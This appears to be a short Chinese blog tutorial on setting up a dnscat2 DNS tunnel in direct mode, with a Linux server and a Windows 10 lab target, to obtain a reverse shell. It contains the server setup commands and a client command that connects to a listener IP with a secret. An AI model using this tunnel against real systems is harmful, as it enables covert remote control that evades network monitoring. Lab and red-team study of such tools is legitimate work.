使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
Robpubking16 小时前
AWS 中 S3 的 server-side encryption 解释与说明
运维·aws
福旺旺16 小时前
Linux——解压缩各类文件
linux
MasterLi802318 小时前
我的读书清单
android·linux·学习
huangwxiao19 小时前
ATT&CK红队评估一
web安全·内网安全·红日靶场
ha204289419419 小时前
Linux操作系统学习之---初识网络
linux·网络·学习
飞凌嵌入式19 小时前
【玩转多核异构】T153核心板RISC-V核的实时性应用解析
linux·嵌入式硬件·嵌入式·risc-v
上海云盾安全满满19 小时前
支付网站屡遭CC攻击,高防ip能防CC攻击吗
tcp/ip·安全·web安全
陌路2019 小时前
Linux 34TCP服务器多进程并发
linux·服务器·网络
玉树临风江流儿19 小时前
Linux驱动开发实战指南-中
linux·驱动开发
爱喝矿泉水的猛男19 小时前
单周期Risc-V指令拆分与datapath绘制
运维·服务器·risc-v